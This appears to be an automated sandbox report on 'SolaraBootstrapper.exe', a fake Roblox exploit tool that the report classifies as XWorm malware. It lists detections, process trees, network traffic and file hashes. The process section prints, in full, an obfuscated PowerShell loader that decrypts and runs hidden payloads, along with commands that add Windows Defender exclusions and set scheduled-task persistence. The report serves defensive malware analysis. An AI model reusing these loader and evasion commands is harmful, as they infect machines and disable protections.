Analysis Overview
SHA256
14cf7648123e018dcdfc2aa386135a0510a9f7b12b8bc125ad4e32fd7f16999c
Threat Level: Known bad
The file SolaraBootstrapper.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Drops startup file
Themida packer
Checks BIOS information in registry
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Unsigned PE
Program crash
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 01:03
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 01:03
Reported
2024-06-21 01:06
Platform
win7-20231129-en
Max time kernel
52s
Max time network
150s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1088
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6e99758,0x7fef6e99768,0x7fef6e99778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1528 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1464 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1308 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3296 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3564 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3676 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3632 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3736 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 --field-trial-handle=1292,i,14842443339419997290,9781670076466800223,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | chrome.google.com | udp |
| GB | 142.250.187.238:443 | chrome.google.com | tcp |
| GB | 142.250.187.238:443 | chrome.google.com | tcp |
| US | 8.8.8.8:53 | chromewebstore.google.com | udp |
| GB | 216.58.201.110:443 | chromewebstore.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 216.58.201.110:443 | chromewebstore.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.202:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | scone-pa.clients6.google.com | udp |
| GB | 142.250.200.42:443 | scone-pa.clients6.google.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 142.250.200.42:443 | scone-pa.clients6.google.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| GB | 216.58.201.110:443 | chromewebstore.google.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| FR | 172.217.18.195:443 | beacons.gvt2.com | tcp |
| FR | 172.217.18.195:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
Files
memory/2380-0-0x00000000748BE000-0x00000000748BF000-memory.dmp
memory/2380-1-0x0000000001160000-0x000000000116A000-memory.dmp
memory/2380-2-0x00000000748B0000-0x0000000074F9E000-memory.dmp
memory/2380-3-0x00000000748B0000-0x0000000074F9E000-memory.dmp
\??\pipe\crashpad_2644_VWKBSXKQAPQRNAFH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 538fb5ca4efb281d5672cfe9d99ffb47 |
| SHA1 | c8555b58462708637aaea99310c520d0218f8f4d |
| SHA256 | 56c7a7c2681567e3e4b47e2c6bc989231cbc91b6ece25c6eab00996969e31206 |
| SHA512 | c124d32c69440e0ae47f5e75f6d303d89d179316899cc382bff120ed9604c01c731381720b18ade4542ed9b9ef38587531895512923ad9ff33a2ec548a079cc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c430224fb8c62e2607a3725ab106e1c9 |
| SHA1 | d0c25e6fa0e9cf015679854d40132d8148681bb6 |
| SHA256 | ca23365dccd53ead4932378762990b4c901a5b306e28aef19692e952fe08b4cd |
| SHA512 | 7dac5e26c2d9416048478116d37ed7ec30de093e4eb29bc5e83f04005c254c46c7b629b25b17d17c83f43deb218d525e1605dae9d8c385be7b26e0e2da962c2a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c298d2b14d5ba531fa16970abb5735e0 |
| SHA1 | fe8e07c633234b1e6ab7efdf3cf8677d94b08a1a |
| SHA256 | 8fc355996ce8679bdc1e6f980df29a6e7a5a62ac863b0664de0fcdb8544c938f |
| SHA512 | 4ed359b7e4adabd79d134f716fa6e81552522bf991d0f56f4126f0087f25027aa8e9d361188cb8be29006b27fee929237cb1d51a010c077557ef1ef3a987863c |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-21 01:03
Reported
2024-06-21 01:06
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
| N/A | N/A | C:\Users\Admin\XClient.exe | N/A |
Loads dropped DLL
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\XClient.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_846_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_846.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_846.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_846.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Roaming\startup_str_846.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\XClient.exe"
C:\Users\Admin\XClient.exe
C:\Users\Admin\XClient.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clientsettings.roblox.com | udp |
| PL | 128.116.124.3:443 | clientsettings.roblox.com | tcp |
| US | 8.8.8.8:53 | 3.124.116.128.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
